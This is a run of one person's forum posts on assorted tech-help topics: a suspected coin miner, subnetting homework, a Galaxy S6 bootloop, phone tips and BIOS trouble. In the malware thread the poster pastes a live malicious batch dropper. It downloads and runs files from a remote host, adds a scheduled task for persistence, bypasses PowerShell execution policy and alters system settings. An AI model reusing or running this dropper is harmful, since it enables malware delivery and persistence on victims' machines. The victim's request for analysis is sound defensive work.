ciprian97pop

I... I really don't know. It's more embarrassing as i work as a system administrator and I should be the one stopping things like this from happening. If I think a bit, I might have gotten this a few days earlier when I did some data recovery for a company. They had a few bad drives that weren't recognized in windows so I used testdisk to recover some files. Maybe that was the moment in which I got that

Yep. Malware-bytes got rid of it I will keep doing some daily scans until next week just to be sure

Hi again So... yeah.. Today I installed malware-bytes and let's just say that that wasn't a windows event reporter Again, thank you guys for your involvement

Thank you guys for your replies I will stop killing the process and let it run hoping it will disappear soon. Just hoping that i won't have the surprise of turning on my laptop tomorrow morning and finding everything encrypted P.S.: Making a backup on google drive with my most important files just to be safe

Are you sure? why would it need to consume that much cpu if it's just some event monitor I also read that article but didn't thought much of it

Hello everyone Today I noticed a weird process showing up in task manager, that's constantly consuming 45-50% of my cpu all the time The process is called sysmon.exe and i'm aware of it since a few hours ago. Everytime i kill the process it comes back. It also creates the .exe in the appdata/temp folder I've searched online but i didn't find almost anything about it. Also, I'm in the process of downloading an antivirus (used windows defender because i don't download or use suspicious stuff) I also thought that it might be some sort of coin miner but it wasn't using any internet Here's a screenshot of it: Also, here's the path to the file UPDATE: After some more digging, i found out that everytime, it creates a temp_XXXX folder (wher xxxx are random numbers) and in that folder it also creates 3 .bat files The start.bat file is just running the build.bat file but here's what i found when i opened the build.bat file At this point i'm 99% sure that this is some kind of coin miner/malware Here comes the fun part This is what i found when I opened the upd.bat file <spoiler> ping www.google.com -n 1 -w 1000 if %errorlevel% == 1 ( exit ) if not exist "%TEMP%\7za.exe" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31f g1x2. org/7za.exe -OutFile \"%TEMP%\7za.exe\"" ) if not exist "%TEMP%\ppuarchive4.zip" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31 fg1x2. org/packagenew_unsigned.zip -OutFile \"%TEMP%\ppuarchive4.zip\"" ) if not exist "%TEMP%\bcmuarchive12.zip" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31f g1x2. org/packagehwloc_unsigned.zip -OutFile \"%TEMP%\bcmuarchive12.zip\"" ) if not exist "%TEMP%\tmg.ps1" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31f g1x2. o rg/trackermagic.ps1 -OutFile \"%TEMP%\tmg.ps1\"" ) if not exist "%TEMP%\opokl.txt" ( PowerShell -NoLogo -Command "Invoke-WebRequest -Uri http://31b4bd 31fg1x2 .o rg/svchostc_task.xml -OutFile \"%TEMP%\svctask.xml\"" PowerShell -NoLogo -Command "(gc \"%TEMP%\svctask.xml\") -replace 'LOCALAPPDATA', '%LOCALAPPDATA%' | Out-File \"%TEMP%\svctask.xml\"" schtasks /Create /xml "%TEMP%\svctask.xml" /tn "svchostc" /F del "%TEMP%\svctask.xml" echo a > "%TEMP%\opokl.txt" ) if not exist "%LOCALAPPDATA%\WindowsDefenderTemp\update.vbs" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31f g1x2. o rg/batch bot.vbs -OutFile \"%TEMP%\batchbot.vbs\"" PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg 1x2.or g/batchinstaller.bat -OutFile \"%TEMP%\batchinstaller.bat\"" PowerShell -Command "Invok e-WebRequest -Uri http://31b4bd 31fg1x2.o rg/batchtask.xml -OutFile \"%TEMP%\batchtask.xml\"" "%TEMP%\batchinstaller.bat" ) set list=FDBBBAD251AD958202EBB8D72746CEDC85DA45F2 8763B0C12D08BF29E40929B97A05D89721F8387D 4F4BA35DCA24DFA59E3CAADEA01C1094A1D0DB9F 39999E1648D457EC986B80CA2319C3B3E6B6C26B D0011BD12AA2D97084AC8D9E08FAA4C7307D616C EEFD9416DF1F743F26CD0B695C437626D951D752 FA58AD3904381B2E35CD233CD3DEFB13DB83FDC7 92B60DF728B47048D8354AB9C96ADCD60B25B01A 77E386B5AB1046DD872394DED2C93B312B93EAD1 (for %%a in (%list%) do ( powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" tracker.leechers-paradise.org 6969 %%a 90 powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" tracker.coppersurfer.tk 6969 %%a 90 powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" exodus.desync.com 6969 %%a 90 )) powercfg /SETACVALUEINDEX SCHEME_CURRENT 0012ee47-9041-4b5d-9b77-535fba8b1442 6738e2c4-e8a5-4a42-b16a-e040e769756e 0 powercfg /SETDCVALUEINDEX SCHEME_CURRENT 0012ee47-9041-4b5d-9b77-535fba8b1442 6738e2c4-e8a5-4a42-b16a-e040e769756e 0 powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 29f6c1db-86da-48c5-9fdb-f2b67b1f44da 0 powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 29f6c1db-86da-48c5-9fdb-f2b67b1f44da 0 powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 9d7815a6-7ee4-497e-8888-515a05f02364 0 powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 9d7815a6-7ee4-497e-8888-515a05f02364 0 powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1 powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\GraphicsDrivers" /v TdrDelay /t REG_SZ /d "8" /f if not exist "%LOCALAPPDATA%\svc10.17134\d.txt" ( "%TEMP%\7za.exe" x "%TEMP%\ppuarchive4.zip" -o"%~dp0" -y "%~dp0\packagenew\buildpassive.bat" echo d > "%LOCALAPPDATA%\svc10.17134\d.txt" rmdir /s /q "%~dp0\packagenew" ) taskkill /f /im sysmon.exe ::tasklist /FI "IMAGENAME eq sysmon.exe" 2>NUL | find /I /N "sysmon.exe">NUL ::if "%ERRORLEVEL%"=="0" exit "%TEMP%\7za.exe" x "%TEMP%\bcmuarchive12.zip" -o"%~dp0" -y "%~dp0\packagehwloc\start.bat" start /b "" cmd /c del "%~dp0\upd.bat"&exit /b </spoiler> Yeah, so it surely is a virus or some sort of malware Could someone explain me what that code does? It would help alot Also, any suggestions would be greatly appreciated. Thank you

link to the contest: https://www.reddit.com/r/dogecoin/comments/7kvpy7/video_contest_18_million_doge_to_celebrate_2018/ so basically the guys over on the dogecoin reddit page are organising a contest celebrating that the year 2018 will be the year of the dog To enter the contest you have to create a short and fun video regarding dogecoin and that's it the craziest part is that right now, 18.000.000 dogecoins are worth about $144.000 also, today dogecoin has reached an all time high of $0.008768 P.S.: I am making this topic just to get more people to participate. i am not affiliated in any shape or form with the guys over there and I gain nothing from making this topic, i just wanna make more people aware of this contest and if this violates the rules i'm sorry and i will support all the consequences

thank you for all the links and all the help from the previous post. It would be logical to create different subnets for different parts of the network and for different building stories but thankfully the assignment doesn't have to be that complex. Yeah, it could be, but the extra points that I would be getting for doing that isn't worth the effort because te assignment has also an economical part which includes things like the cost of the whole operation, amortization of equipement and many others. this was just a part of it thank you again for everyone's help

my bad, by the last address i was thinking at x.x.x.254 and by first at x.x.x.1 in the router config i have a few tabs the first tab is lan in which i have the routers ip address(192.168.0.1) the second tah is internet in which i have these boxes(see the screenshot below) it's named wi fi free because i've got the same router set as the free wi-fi part of the network if i set the default gateway like this, to the last address and the ip address as being the first one, on the pcs which shoud i put as the default gateway, the one with 254 at the end? edit: in the screenshot the dg is .2.254 but i've changed it to .3.254

got it i've set the default gateway to 10.0.3.254. the subnet mask auto-filled to 255.255.0.0 but i was able to change it this time without a problem to 255.255.252.0 and i started giving ip addresses to pcs from 10.0.0.2 (because I gave 10.0.0.1 to the main router) and now it works. thank you for your help P.S.: should the default gateway be the last ip address of the inerval like I've set it to be? it's a question that i keet asking myself

this ^ get the 1400 and spend the extra money on a 470/570/480/580 and then maybe try to save up for a cpu cooler for oc edit: if you already have the 1050ti bought, still get the 1400 and invers the money in something else like a cpu cooler

the cpu has nothing to do with the chipset of the board as long as its a am4 board

whichever one is the cheapest. you don't have a big budget and the speed differences between those drives is at max 20-30 mb/s, a difference which you won't notice

hey everyone i have an assignment to make for my networking class but i'm stuck on something i have to make a computer network for a business with 950 hosts i've thought to make it an IT company that has the following structure: 600 hosts for the IT and programming department(500 hosts for desktops and a private wifi network for 100 laptops), 200 hosts for the marketing and hr department and another 150 hosts for public free wi-fi the first step is to calculate the subnet mask, right? that's what i did my subnet mask is 255.255.252.0 (because 2^9 is 512 which is not enough and 2^10 is 1024) now here comes my question. I know that i can use 1024 ips which is more than enough for me but what interval of ip s can i use? at first I thought that i can use any kind of private ips(like 10.x.x.x or 177.(21-32).x.x or 192.168.x.x) but if I put in Cisco Packet Tracer(the program in which i have to exemplify the network) 10.0.0.1 as an ip for a pc, it changes my subnet mask to 255.0.0.0(that's what I remember changing it to). if i set the subnet mask first to 255.255.252.0 and then enter an ip it gives me an error and I cannot continue Can you please tell me what am I doing wrong? and what is the ip interval that i can use thank you

somehow maybe the rom was the problem i tried copying another rom with the same method mentioned above, renamed it and i was able to install it without any problems thank you very much for your help

yep... copied the file as a .zip.o extension without a problem now i'm gonna rename it in the twrp file explorer and try to flash it again

long story short, I simply tried to flash a corrupted zip and i got an error right after i pressed install in the rom that's why I'm trying to be as calm as possible because i'm guessing that it's not such a big deal i tried copying another file, this time being .rar on my phone and it worked now i'm trying to copy the rom but with a different extension, just to see if it works. if it does, then i'll rename it to .zip again and try the flashing process once more

so it's not the end of the world, right? i just have to flash a stock rom with odin then i'm good to go another question. the custom rom that i'm wanting to install doesn't needs the phone to be rooted because it has magisk which will root the phone after installation(most of the roms that i saw work like this) is it a bad thing that i had rooted the phone before or it won't make any difference?

i have a galaxy s6 920f on which i had the xef 7.0 android (it is a phone bought from orange romania, sim locked and the csc was oro) i installed twrp on it and after that i rooted it by flashing a zip file with twrp then i wanted to install a custom rom. i copied the file on the phone but i wasn't paying attention and the copy process stopped in the middle of it but the file was still on the phone. wiped everything that was asked to wipe then proceeded to install the zip only then to find out that the installation ended after about 30 seconds. i tried rebooting and i'm stuck in a bootloop. even though, i can still enter download mode and in the recovery but because i wiped all those things(everything except internal storage and usb otg) i know that i should have checked to see if the file was being copied fully but even now when i connect the phone to my laptop in the recovery to copy the zip, it still does the same thing. i tried using another usb cable, another usb port and even another laptop but the copy process still stops about halfway trough. right now i'm downloading a stock rom and gonna try to flash it with odin. what should i do? any help is appreciated

glad you like it you know how they say; once you go (amoled) black, you never go back

from what i know the 6p doesn't have many issues. just look for the usual stuff play a youtube video. call from it to test the speakers and mics, do a couple of test photos, put your sim card in. you can also try to look for burn-ins in the screen by maxing the brightness and looking at a white picture. it's almost useless to do this because todays amoled screens are much improved but it's better to be safe than sorry

I've installed about one year ago an app on my phone that served as an always on display that would activate when you'd pull it out from your pocket or when you'd grab it from the table it was very simple looking, like the way the motorola notification display looked on the first moto x(if anyone remembers). it would show you the time and notifications if you had any and a small lock icon in the middle which you could drag down to get to your normal lock screen if you know the name of the app please let me know. thanks

sorry for the late reply that didn't helped either but i found a link from a dell tutorial on how to downgrade your bios version did that and got back to the original bios but the problem still persists any other suggestions? i don't think that there can be something else that i can do.. nothing comes trough my mind

Sorry for the double quote but look what I thought of Let's say that the problem is with my bios Wouldn't switching to uefi or efi mode fix the problem?

Right now I'm reinstalling windows. Let's hope that this fixes the problem. If not, I'll try to disable the card reader because I never used it. If that also doesn't works I'll know that the bios is the problem